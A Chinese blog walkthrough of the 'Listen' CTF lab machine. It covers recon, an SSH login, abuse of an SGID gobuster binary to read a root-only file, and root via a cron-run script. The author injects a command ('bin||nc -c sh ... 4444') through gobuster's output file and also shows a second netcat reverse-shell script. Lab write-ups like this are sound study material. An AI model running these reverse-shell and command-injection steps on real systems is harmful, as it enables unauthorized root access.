HackMyVM-Listen靶机详解WP
城南花已开 Lv5

信息收集

服务探测

ll104567大佬自己出的easy靶机,因为最后的Flag是HMV{xxxxxx}

那就暂且归类到HackMyVM的分类好了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.145 08:00:27:25:83:90 (Unknown)
192.168.60.254 00:50:56:e0:55:bd (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.969 seconds (130.02 hosts/sec). 4 responded
export ip=192.168.60.145
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.145:22
Open 192.168.60.145:80
^[[B^[[B[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-08 14:45 CST
Initiating ARP Ping Scan at 14:45
Scanning 192.168.60.145 [1 port]
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 14:45 (0:00:00 remaining)
Completed ARP Ping Scan at 14:45, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:45
Completed Parallel DNS resolution of 1 host. at 14:45, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:45
Scanning 192.168.60.145 [2 ports]
Discovered open port 80/tcp on 192.168.60.145
Discovered open port 22/tcp on 192.168.60.145
Completed SYN Stealth Scan at 14:45, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.145
Host is up, received arp-response (0.00049s latency).
Scanned at 2025-01-08 14:45:31 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:25:83:90 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

用户提权

curl一下80端口

1
2
❯ curl $ip
<h1>welcome:welcome_again</h1>

猜测大概率用户凭证,ssh登入一下

welcome的默认Shell是sh,不太好操作

换成bash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
❯ ssh welcome@$ip
The authenticity of host '192.168.60.145 (192.168.60.145)' can't be established.
ED25519 key fingerprint is SHA256:wjUcj6T6r6sq8a/m+aBJnDgmy0hOeMWF04F18Qfae3Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.145' (ED25519) to the list of known hosts.
welcome@192.168.60.145's password:
Linux listen 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Could not chdir to home directory /home/welcome: No such file or directory
$ bash
welcome@listen:/$

直接传个linpeas.sh自动化扫一遍吧

1
2
3
4
5
6
7
8
9
10
11
12
13
welcome@listen:/$ cd /tmp/
welcome@listen:/tmp$ wget 192.168.60.100/linpeas.sh
--2025-01-08 01:53:33-- http://192.168.60.100/linpeas.sh
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827739 (808K) [application/octet-stream]
Saving to: ‘linpeas.sh’

linpeas.sh 100%[=======================================================================>] 808.34K --.-KB/s in 0.02s

2025-01-08 01:53:33 (48.1 MB/s) - ‘linpeas.sh’ saved [827739/827739]

welcome@listen:/tmp$ chmod +x linpeas.sh

文件读取

发现gobuster拥有SGID权限,可以以root的身份运行该程序

1
2
3
4
5
6
7
8
9
10
11
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 31K Jul 27 2018 /usr/bin/expiry
-rwxr-sr-x 1 root ssh 315K Jan 31 2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 15K May 4 2018 /usr/bin/bsd-write
-rwsr-sr-x 1 root root 4.8M Feb 3 2019 /usr/bin/gobuster (Unknown SGID binary)
-rwxr-sr-x 1 root tty 35K Jan 10 2019 /usr/bin/wall
-rwxr-sr-x 1 root crontab 43K Oct 11 2019 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 71K Jul 27 2018 /usr/bin/chage
-rwxr-sr-x 1 root mail 19K Dec 3 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 39K Feb 14 2019 /usr/sbin/unix_chkpwd

想到了之前有做过一个靶机也是类似的方案

利用gobuster的-w字典指定文本,扫描kali启动的http服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
welcome@listen:/tmp$ /usr/bin/gobuster -u http://192.168.60.100:8000 -w /root/root.txt

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.60.100:8000/
[+] Threads : 10
[+] Wordlist : /root/root.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2025/01/08 01:59:58 Starting gobuster
=====================================================
=====================================================
2025/01/08 01:59:58 Finished
=====================================================
welcome@listen:/tmp$
❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.60.145 - - [08/Jan/2025 15:00:00] "GET / HTTP/1.1" 200 -
192.168.60.145 - - [08/Jan/2025 15:00:00] code 404, message File not found
192.168.60.145 - - [08/Jan/2025 15:00:00] "GET /fd8e2be6-6ac3-46ca-bfe3-ac88e15b27ba HTTP/1.1" 404 -
192.168.60.145 - - [08/Jan/2025 15:00:00] code 404, message File not found
192.168.60.145 - - [08/Jan/2025 15:00:00] "GET /HMV%7Bjust_root_flag%7D HTTP/1.1" 404 -

GET请求时url编码,解码一下即可

image

这样就拿到flag了,一般到交完flag就结束了

Root提权

但要想真正拿下靶机,还要拿到root Shell

经过一番收集,在/opt目录下有个隐藏的bash脚本.test.sh

1
2
3
4
5
welcome@listen:/opt$ ls -al
total 12
drwxr-xr-x 2 root root 4096 Jan 7 05:54 .
drwxr-xr-x 18 root root 4096 Oct 16 2020 ..
-rwx------ 1 root root 10 Jan 7 05:54 .test.sh

我传个pspy64到靶机,监测一下进程

可以发现有个定时任务每一分钟会执行.test.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
welcome@listen:/tmp$ wget 192.168.60.100/pspy64
--2025-01-08 02:03:04-- http://192.168.60.100/pspy64
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64 100%[=======================================================================>] 2.96M --.-KB/s in 0.03s

2025-01-08 02:03:04 (94.2 MB/s) - ‘pspy64’ saved [3104768/3104768]

welcome@listen:/tmp$ chmod +x pspy64
2025/01/08 02:04:01 CMD: UID=0 PID=24807 | /usr/sbin/CRON -f
2025/01/08 02:04:01 CMD: UID=0 PID=24808 | /usr/sbin/CRON -f
2025/01/08 02:04:01 CMD: UID=0 PID=24809 | /bin/sh -c /bin/bash /opt/.test.sh

这里其实是可以想到用gobuster的-o将扫描结果输出到指定的文件

但卡在如何构造一个路径或者命令

因为gobuster在扫到目标后会自动添加一个/

这时候想到bash中可以根据命令执行的判断依据;、&&、||

说白了就是一次输入多个命令,&&、||可以根据前一个的命令返回值$?来判断后面的命令是否执行

具体的解释我贴在下面

image

那我们就在kali上构造这么个文件夹

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
mkdir "bin||nc -c sh 192.168.60.100 4444"
❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
-------------分隔-----------------------
welcome@listen:/tmp$ echo "bin||nc -c sh 192.168.60.100 4444">dir.txt
welcome@listen:/tmp$ /usr/bin/gobuster -u http://192.168.60.100:8000 -w /tmp/dir.txt

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.60.100:8000/
[+] Threads : 10
[+] Wordlist : /tmp/dir.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2025/01/08 02:20:01 Starting gobuster
=====================================================
/bin||nc -c sh 192.168.60.100 4444 (Status: 301)
=====================================================
2025/01/08 02:20:01 Finished
=====================================================
welcome@listen:/tmp$

好的,可以输出我们想要的内容

gobuster加几个参数过滤掉噪声,只输出重要信息

1
2
welcome@listen:/tmp$ /usr/bin/gobuster -u http://192.168.60.100:8000 -w /tmp/dir.txt  -n -q
/bin||nc -c sh 192.168.60.100 4444

最后加个-o参数输出内容到/tmp/.test.sh即可

-n 不打印 HTTP 状态码。你可以使用此选项来减少输出的噪声,只关注其他重要信息。

-q 不打印横幅和其他噪音。适用于减少输出中的杂项信息,只显示扫描结果。

1
2
3
4
5
6
7
welcome@listen:/tmp$ /usr/bin/gobuster -u http://192.168.60.100:8000 -w /tmp/dir.txt  -n -q -o /opt/.test.sh
/bin||nc -c sh 192.168.60.100 4444
welcome@listen:/tmp$ ls -al /opt/
total 12
drwxr-xr-x 2 root root 4096 Jan 7 05:54 .
drwxr-xr-x 18 root root 4096 Oct 16 2020 ..
-rwx------ 1 root root 35 Jan 8 02:22 .test.sh ##文件被修改了

可以看到pwncat-cs在拿到shell后会自动执行稳定shell的流程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
2025/01/08 02:23:01 CMD: UID=0     PID=24919  | /usr/sbin/CRON -f
2025/01/08 02:23:01 CMD: UID=0 PID=24920 | /usr/sbin/CRON -f
2025/01/08 02:23:01 CMD: UID=0 PID=24921 | /bin/sh -c /bin/bash /opt/.test.sh
2025/01/08 02:23:01 CMD: UID=0 PID=24922 | /bin/bash /opt/.test.sh
2025/01/08 02:23:01 CMD: UID=0 PID=24923 | /bin/bash /opt/.test.sh
2025/01/08 02:23:01 CMD: UID=0 PID=24924 | sh -c sh
2025/01/08 02:23:01 CMD: UID=0 PID=24925 | sh
2025/01/08 02:23:01 CMD: UID=0 PID=24926 | sh
2025/01/08 02:23:01 CMD: UID=0 PID=24927 | sh
2025/01/08 02:23:01 CMD: UID=0 PID=24929 | sh
2025/01/08 02:23:01 CMD: UID=0 PID=24928 | sh
2025/01/08 02:23:01 CMD: UID=0 PID=24930 | sh
2025/01/08 02:23:01 CMD: UID=0 PID=24931 | sh
2025/01/08 02:23:01 CMD: UID=0 PID=24932 | sh
2025/01/08 02:23:02 CMD: UID=0 PID=24933 | sh
2025/01/08 02:23:02 CMD: UID=0 PID=24934 | sh
2025/01/08 02:23:02 CMD: UID=0 PID=24936 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24935 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24937 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24938 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24939 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24940 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24941 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24942 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24943 | /usr/bin/bash
2025/01/08 02:23:02 CMD: UID=0 PID=24944 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24945 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24946 | /usr/bin/script -qc /usr/bin/bash /dev/null
2025/01/08 02:23:03 CMD: UID=0 PID=24947 | sh -c /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24948 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24949 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24950 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24952 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24951 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24953 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24954 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24955 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24956 | /usr/bin/bash
2025/01/08 02:23:03 CMD: UID=0 PID=24957 | /usr/bin/bash

在kali监听一下端口,就成功拿到Shell了

1
2
3
4
5
6
7
8
9
10
11
12
13
❯ pwncat-cs -lp 4444
[15:19:10] Welcome to pwncat 🐈! __main__.py:164
[15:23:03] received connection from 192.168.60.145:58318 bind.py:84
[15:23:03] 0.0.0.0:4444: normalizing shell path manager.py:957
0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[15:23:04] 192.168.60.145:58318: registered new host w/ db manager.py:957
(local) pwncat$
(remote) root@listen:/root# id
uid=0(root) gid=0(root) groups=0(root)
(remote) root@listen:/root# cat /root/root.txt
HMV{just_root_flag}
(remote) root@listen:/root# cat /root/user.txt
HMV{just_user_flag}

不过除了这种利用||,还有一种方案就是将nc命令写到文件中,在把文件路径写入.test.sh

1
2
3
4
5
6
7
welcome@listen:/tmp$ echo 'nc -c sh 192.168.60.100 4444'>exp
welcome@listen:/tmp$ chmod +x exp ## 赋予执行权限
welcome@listen:/tmp$ echo 'tmp/exp'>dir.txt ##重新构造字典
---------------分隔--------------
mkdir -p tmp/exp
❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

利用一下

1
2
3
4
5
6
7
8
9
10
11
12
welcome@listen:/tmp$ ls -al /opt/
total 12
drwxr-xr-x 2 root root 4096 Jan 7 05:54 .
drwxr-xr-x 18 root root 4096 Oct 16 2020 ..
-rwx------ 1 root root 35 Jan 8 02:24 .test.sh
welcome@listen:/tmp$ /usr/bin/gobuster -u http://192.168.60.100:8000 -w /tmp/dir.txt -n -q -o /opt/.test.sh
/tmp/exp
welcome@listen:/tmp$ ls -al /opt/
total 12
drwxr-xr-x 2 root root 4096 Jan 7 05:54 .
drwxr-xr-x 18 root root 4096 Oct 16 2020 ..
-rwx------ 1 root root 9 Jan 8 02:30 .test.sh

/opt/.test.sh 脚本尝试执行 /tmp/exp 文件

这样就类似于链接了,你可以随意修改exp,反弹shell方案有很多

Online - Reverse Shell Generator

由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 258.9k